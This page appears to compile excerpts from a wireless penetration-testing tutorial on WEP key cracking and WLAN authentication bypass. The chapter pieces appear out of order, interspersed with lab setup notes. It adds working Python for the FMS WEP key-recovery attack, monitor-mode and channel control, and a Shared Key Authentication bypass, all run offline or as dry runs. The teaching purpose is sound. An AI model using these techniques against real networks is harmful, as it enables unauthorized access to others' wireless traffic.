itsecpackets

WLAN Encryption Flaws


“640 K is more memory than anyone will ever need.” 

Bill Gates, Founder, Microsoft

Even with the best of intentions, the future is always unpredictable. The IEEE 802.11 committee designed WEP, and the industry followed it with WPA, both intended as foolproof encryption mechanisms; over time both turned out to have flaws that have been widely publicized and exploited in the real world.

Here, we will look at each of these encryption protocols and demonstrate various attacks against them.

 

WEP encryption

The WEP protocol was known to be flawed as early as 2000, but surprisingly it continues to be used, and access points still ship with WEP enabled as an option.

There are many cryptographic weaknesses in WEP; they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluating WEP from a cryptographic standpoint is beyond the scope of this book, as it involves some fairly complex math. Here, we will look at how to break WEP encryption using readily available tools on the BackTrack platform: the entire Aircrack-ng suite of tools, including airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and others.

Let us now first set up WEP in our test lab and see how we can break it.

What just happened?

We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng tool to capture an ARP request from that client and replay it into the network. Every replayed request is answered with an ARP reply, relayed by the access point under a fresh IV, so the number of data packets (and of distinct IVs) sent over the air grows rapidly. We then used aircrack-ng to recover the WEP key by exploiting the cryptographic weaknesses in these data packets, namely the statistical biases in RC4's key schedule that tie the first keystream byte to the key bytes for certain IVs.

Note that we can also fake an authentication to the access point using the Shared Key Authentication bypass technique we learnt in the last chapter. This comes in handy if the legitimate client leaves the network: we can spoof an authentication and association ourselves and continue to send our replayed packets into the network.
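As an added illustration of the weakness aircrack-ng exploits (this is not code from the book or from aircrack-ng), the Python below implements the Fluhrer, Martin and Shamir (FMS) attack against a 40-bit WEP key. It assumes a constructed capture: rather than reading an airodump-ng file, it generates in-process, with a real RC4, the first ciphertext byte of frames whose IVs fall in the FMS weak-IV class (B+3, 0xFF, x), mixed with some ordinary IVs the attack must filter out. The secret key is a constructed value; the only other input is the fact that every WEP data frame body starts with the LLC/SNAP byte 0xAA, which is what makes the first keystream byte known to the attacker. The fudge-factor search at the end mirrors what aircrack-ng's -f option does: try the best few candidates per byte and accept a key only if it reproduces the captured bytes.

```python
"""FMS recovery of a 40-bit WEP key from the first ciphertext byte of weak-IV frames.

Added example, not from the book or from aircrack-ng.  The "capture" is
constructed in-process with a real RC4 so the whole attack runs offline.
"""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # every WEP data frame body starts with LLC/SNAP: AA AA 03 ...
IV_LEN = 3              # WEP per-packet RC4 key = 24-bit IV || secret key


def rc4_ksa(key, steps=256):
    """RC4 key scheduling for `steps` rounds; returns the state S and pointer j."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_keystream_byte(key):
    """First keystream byte: one PRGA step after the full KSA."""
    S, _ = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) & 0xFF]


def wep_first_cipher_byte(iv, secret):
    """What a sniffer sees as the first encrypted body byte of a WEP data frame."""
    return rc4_first_keystream_byte(bytes(iv) + secret) ^ SNAP_FIRST_BYTE


def simulate_capture(secret, key_len=5):
    """Constructed stand-in for an airodump-ng capture.  Only IVs of the form
    (B+3, 0xFC..0xFF, x) are generated; the (B+3, 0xFF, x) ones are the FMS
    weak-IV class, the rest stand in for ordinary traffic that the attack must
    filter out.  A real ARP-replay capture has tens of thousands of those."""
    packets = []
    for b in range(key_len):
        for second in range(0xFC, 0x100):
            for x in range(256):
                iv = (IV_LEN + b, second, x)
                packets.append((iv, wep_first_cipher_byte(iv, secret)))
    return packets


def fms_votes(packets, known, fudge):
    """Vote for key byte number len(known) using every frame whose IV is
    'resolved' for that position; return the `fudge` best candidates."""
    pos = IV_LEN + len(known)                  # index of the key byte under attack
    votes = Counter()
    for iv, c0 in packets:
        # Run the KSA exactly as far as the bytes we know: IV || recovered key bytes.
        S, j = rc4_ksa(list(iv) + known, steps=pos)
        s1 = S[1]
        # Resolved condition: the first PRGA output will (with p ~ 5%) be whatever
        # the next KSA step swaps into S[pos], provided the remaining steps leave
        # positions 1, S[1] and pos alone.
        if s1 >= pos or (s1 + S[s1]) & 0xFF != pos:
            continue
        z = c0 ^ SNAP_FIRST_BYTE               # first keystream byte, known thanks to SNAP
        # The next step computes j' = j + S[pos] + K[pos] and moves S[j'] into S[pos];
        # if Z == S[j'] then K[pos] = S^-1[Z] - j - S[pos].  The ~95% of wrong
        # guesses are spread uniformly over 256 values and lose the vote.
        votes[(S.index(z) - j - S[pos]) & 0xFF] += 1
    return [byte for byte, _ in votes.most_common(fudge)]


def fms_recover_key(packets, key_len=5, fudge=3):
    """Depth-first search over the `fudge` best candidates per byte (the idea
    behind aircrack-ng's fudge factor); a full key is accepted only when it
    reproduces the captured ciphertext bytes, so a bad vote cannot mislead us."""
    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            ok = all(wep_first_cipher_byte(iv, key) == c0 for iv, c0 in packets[:16])
            return key if ok else None
        for cand in fms_votes(packets, known, fudge):
            key = search(known + [cand])
            if key is not None:
                return key
        return None
    return search([])


if __name__ == "__main__":
    secret = bytes([0x1F, 0x2A, 0x3B, 0x4C, 0x5D])   # constructed 40-bit key
    capture = simulate_capture(secret)
    print(f"{len(capture)} frames captured, key recovered: {fms_recover_key(capture).hex()}")
```

The attack needs nothing but the IV (sent in the clear in every frame) and one ciphertext byte per frame, which is why injecting ARP traffic to multiply the number of IVs is enough to break the key; a 104-bit key only means more key bytes for the same loop.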


penetration testing


Hardware requirements

We will need the following hardware to set up the wireless lab:

- Two laptops with internal Wi-Fi cards: We will use one of the laptops as the victim in our lab and the other as the penetration tester's laptop. Though almost any laptop would fit this profile, laptops with at least 3 GB of RAM are desirable, because we may be running a lot of memory-intensive software in our experiments.
- One Alfa wireless adapter: We need a USB Wi-Fi card that supports packet injection and packet sniffing and that is supported by BackTrack. The best choice seems to be the Alfa AWUS036H card from Alfa Networks, as BackTrack supports it out of the box. It is available on Amazon.com for a retail price of $34 at the time of writing.
- One access point: Any access point that supports the WEP/WPA/WPA2 encryption standards would fit the bill. I will be using a D-LINK DIR-615 Wireless N Router for the purpose of illustration throughout this book. You can purchase it from Amazon.com, where it is retailing at around $35 at the time of writing.
- An Internet connection: This will come in handy to perform research, download software, and for some of our experiments.

Software requirements

We will need the following software to set up the wireless lab:

- BackTrack 5: BackTrack can be downloaded from its official website at http://www.backtrack-linux.org. The software is open source and you should be able to download it directly from the website.
- Windows XP/Vista/7: You will need one of Windows XP, Windows Vista, or Windows 7 installed on one of the laptops. This laptop will be used as the victim machine for the rest of the book.

It is important to note that even though we are using a Windows-based OS for our tests, the techniques learnt can be applied to any Wi-Fi capable device, such as smartphones and tablets, among others.

 

Installing BackTrack

Let us now quickly look at how to get up and running with BackTrack.

BackTrack will be installed on the laptop which will serve as the penetration tester's machine for the rest of the book.

Important note on WLAN sniffing and injection

WLANs typically operate within three different frequency ranges: 2.4 GHz, 3.6 GHz, and 4.9/5.0 GHz. Not all Wi-Fi cards support all these ranges and their associated bands. As an example, the Alfa card we are using supports only IEEE 802.11b/g, which means it cannot operate on 802.11a (5 GHz) networks and cannot decode the high-throughput rates of 802.11n. The key point here is that to sniff or inject packets in a particular band, your Wi-Fi card will need to support it.

Another interesting aspect of Wi-Fi is that each of these bands is divided into multiple channels. It is important to note that your Wi-Fi card can only be on one channel at any given moment; it is not possible to tune into multiple channels at the same time. The analogy I can give you is your car radio: you can tune it to only one of the available stations at any given time, and if you want to hear something else, you have to change the station. The same principle applies to WLAN sniffing. This brings us to an important conclusion: we cannot sniff all channels at the same time, so we need to select which channel is of interest to us. If our access point of interest is on channel 1, we will need to set our card to channel 1. Tools such as airodump-ng work around this by channel hopping, that is, cycling the card through the channels and dwelling briefly on each; this gives a view of the whole band at the cost of missing frames on every channel the card is not tuned to at that moment.

Though we have addressed WLAN sniffing in the previous paragraphs, the same applies to injection as well. To inject packets on a specific channel, we will need to put the card's radio on that channel.

Let's now do some exercises on setting our card to specific channels, channel hopping, setting regulatory domains, power levels, and so on.
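The exercises themselves are not reproduced on this page. As an added example (not the book's code, which drives BackTrack 5's iwconfig and airmon-ng), here is the same sequence in Python around the Linux iw and ip commands: put the card in monitor mode, tune it to a single channel, hop across a list of channels, and set the regulatory domain and transmit power. The interface name wlan0, the channel list and the dwell time are assumptions; the run argument lets the commands be recorded or printed instead of executed, since executing them needs root and a monitor-capable card.

```python
"""Monitor mode, channel selection, channel hopping, regulatory domain and
TX power through the Linux `iw` and `ip` tools.

Added example, not from the book.  Real use needs root and a monitor-capable
card; pass run=print_cmd (or a list's .append) to see the commands instead.
"""
import subprocess
import time


def channel_to_mhz(channel):
    """Centre frequency of an 802.11 channel: 2.4 GHz (1-14) or 5 GHz (36-177).
    Raises ValueError for numbers that are not channels at all; whether a given
    card or regulatory domain permits a valid channel is up to the driver."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484                    # Japan-only 802.11b channel, off the 5 MHz grid
    if 36 <= channel <= 177:
        return 5000 + 5 * channel
    raise ValueError(f"not an 802.11 channel: {channel}")


def exec_cmd(argv):
    """Default runner: execute the command and raise if it fails."""
    subprocess.run(argv, check=True)


def print_cmd(argv):
    """Dry-run runner: show the command instead of executing it."""
    print(" ".join(argv))


class WifiCard:
    def __init__(self, iface="wlan0", run=exec_cmd):   # iface is an assumption
        self.iface = iface
        self.run = run
        self.channel = None

    def monitor_mode(self):
        """What `airmon-ng start wlan0` does underneath: take the interface down,
        switch it to monitor mode so it passes up every frame it hears, bring it up."""
        for argv in (["ip", "link", "set", "dev", self.iface, "down"],
                     ["iw", "dev", self.iface, "set", "type", "monitor"],
                     ["ip", "link", "set", "dev", self.iface, "up"]):
            self.run(argv)

    def set_channel(self, channel):
        """Tune the one radio to one channel; sniffing and injection both happen
        only there until the channel is changed.  Returns the centre frequency."""
        mhz = channel_to_mhz(channel)       # reject impossible channels before touching the card
        self.run(["iw", "dev", self.iface, "set", "channel", str(channel)])
        self.channel = channel
        return mhz

    def hop(self, channels, dwell=0.25, rounds=None):
        """Cycle through `channels`, dwelling `dwell` seconds on each, forever or
        for `rounds` passes.  This is what airodump-ng does when no channel is
        fixed: coverage of the whole band, at the price of frames missed on every
        channel the card is not currently on.  Returns the visiting order."""
        visited = []
        passes = 0
        while rounds is None or passes < rounds:
            for ch in channels:
                self.set_channel(ch)
                visited.append(ch)
                time.sleep(dwell)
            passes += 1
        return visited

    def set_regdomain(self, alpha2):
        """Select the regulatory domain (ISO 3166 code); it bounds the channels
        and power levels the driver will accept."""
        self.run(["iw", "reg", "set", alpha2])

    def set_txpower_dbm(self, dbm):
        """iw takes transmit power in mBm (hundredths of a dBm)."""
        self.run(["iw", "dev", self.iface, "set", "txpower", "fixed", str(dbm * 100)])


if __name__ == "__main__":
    card = WifiCard("wlan0", run=print_cmd)    # dry run: prints the commands
    card.monitor_mode()
    card.set_regdomain("US")
    card.set_txpower_dbm(20)
    card.hop([1, 6, 11], dwell=0, rounds=1)    # the three non-overlapping 2.4 GHz channels
```

Replace run=print_cmd with the default to actually drive the card; a channel the card or regulatory domain does not allow fails at the iw call, while a number that is not a channel at all is refused before any command runs.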

 


Summary

In this chapter, we have made some key observations about WLAN protocols:

Management and Control frames are sent unencrypted, and so are the 802.11 headers of Data frames, so they can be easily read by anyone monitoring the airspace. It is important to note here that the Data frame payload can be protected using encryption to keep it confidential. We will talk about this in the next chapter.

We can sniff the entire airspace in our vicinity by putting our card into monitor mode.

As there is no integrity protection on Management and Control frames (unless the network uses 802.11w management frame protection, which was rare at the time of writing), it is very easy to inject these packets, either modified or replayed as-is, using tools such as aireplay-ng.

Unencrypted data packets can also be modified and replayed back into the network. If the packet is encrypted, we can still replay it as-is, because WEP has no replay protection. The TKIP and CCMP ciphers used by WPA/WPA2 do add a per-packet sequence counter that rejects replayed frames, which is why the ARP replay trick works against WEP but not directly against WPA/WPA2.

In the next chapter, we will look at the different authentication mechanisms used in WLANs, such as MAC filtering, Shared Key Authentication, and so on, and understand the various security flaws in them through live demonstrations.

Bypassing WLAN Authentication

“A false sense of security is worse than being unsure.”

Anonymous

A false sense of security is worse than being insecure, as you may not be prepared to face the eventuality of being hacked.

Summary

In this chapter, we have learnt the following about WLAN authentication:

- Hidden SSIDs are a security-through-obscurity feature that is relatively simple to beat.
- MAC address filters do not provide any security, as MAC addresses can be sniffed from the air: they are sent unencrypted in every 802.11 frame header.
- Open Authentication provides no real authentication at all.
- Shared Key Authentication is a bit tricky to beat, but with the right tools we can derive and store the keystream that a legitimate client used, and with it answer any future challenge sent by the access point. The result is that we can authenticate without needing to know the actual key.
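The Shared Key Authentication bypass summarized in the last point (and relied on earlier in this page to fake an authentication while replaying ARP packets against WEP) comes down to keystream reuse. The Python below is an added example, not the book's or aircrack-ng's code: a stand-in access point, a legitimate client and an eavesdropper run the four-frame exchange; the eavesdropper XORs the cleartext challenge (plus its CRC-32 ICV) with the encrypted reply to recover the keystream for that IV, then answers a later challenge of its own with that keystream and the same IV. The keystream generator is a hash-based stand-in for RC4 (an assumption made so the block is self-contained); the attack never calls it, which is the point: the bypass works for any stream cipher used this way.

```python
"""Shared Key Authentication bypass by keystream reuse.

Added example, not from the book.  Frames are modelled as (iv, body) with
body = keystream(iv, key) XOR (plaintext || CRC-32 ICV), as in WEP.  The
keystream function is a hash-based stand-in for RC4 (assumption), chosen so
this file is self-contained; the eavesdropper never uses it.
"""
import hashlib
import os
import zlib

CHALLENGE_LEN = 128   # the SKA challenge text is 128 bytes


def keystream(iv, key, length):
    """Stand-in for RC4(iv || key): not WEP's real cipher, just a deterministic stream."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(iv + key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def icv(plaintext):
    """WEP integrity check value: a plain CRC-32, no key involved."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(iv, key, plaintext):
    data = plaintext + icv(plaintext)
    return bytes(a ^ b for a, b in zip(data, keystream(iv, key, len(data))))


def wep_decrypt(iv, key, body):
    """Return the plaintext, or None if the ICV does not check."""
    data = bytes(a ^ b for a, b in zip(body, keystream(iv, key, len(body))))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None


class AccessPoint:
    def __init__(self, key):
        self.key = key
        self.pending = {}

    def challenge(self, sta):
        """Frame 2 of SKA: a fresh random challenge, sent in the clear."""
        c = os.urandom(CHALLENGE_LEN)
        self.pending[sta] = c
        return c

    def verify(self, sta, iv, body):
        """Frame 3/4: accept if the body decrypts to the challenge under our key.
        Nothing here checks whether the IV was used before; WEP does not either."""
        return wep_decrypt(iv, self.key, body) == self.pending.pop(sta, None)


class LegitimateClient:
    def __init__(self, key):
        self.key = key
        self.next_iv = 0

    def answer(self, challenge):
        iv = self.next_iv.to_bytes(3, "big")   # a counter, the common IV policy
        self.next_iv += 1
        return iv, wep_encrypt(iv, self.key, challenge)


class Eavesdropper:
    """Holds no key.  Learns (iv, keystream) from one observed exchange and
    reuses it to answer any later challenge of the same length."""
    def __init__(self):
        self.iv = None
        self.ks = None

    def observe(self, challenge, iv, body):
        # challenge || ICV is the full plaintext, so XOR with the body gives the keystream
        data = challenge + icv(challenge)
        self.iv = iv
        self.ks = bytes(p ^ c for p, c in zip(data, body))

    def answer(self, challenge):
        data = challenge + icv(challenge)
        return self.iv, bytes(p ^ k for p, k in zip(data, self.ks))


def demo(key):
    """Run both authentications; returns (legitimate client accepted, eavesdropper accepted)."""
    ap, client, eve = AccessPoint(key), LegitimateClient(key), Eavesdropper()
    c1 = ap.challenge("client")               # 1. a real client authenticates ...
    iv, body = client.answer(c1)
    eve.observe(c1, iv, body)                 # ... while Eve sniffs challenge and reply
    legit_ok = ap.verify("client", iv, body)
    c2 = ap.challenge("eve")                  # 2. later Eve authenticates with reused keystream
    eve_ok = ap.verify("eve", *eve.answer(c2))
    return legit_ok, eve_ok


if __name__ == "__main__":
    print(demo(bytes.fromhex("0102030405")))  # constructed key; expect (True, True)
```

The captured keystream is exactly what aireplay-ng stores for its fake-authentication mode; because the ICV is a keyless CRC-32, the attacker can compute it for the new challenge and needs nothing from the key itself.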

In the next chapter, we will look at the different WLAN encryption mechanisms, WEP, WPA, and WPA2, and at the insecurities which plague them.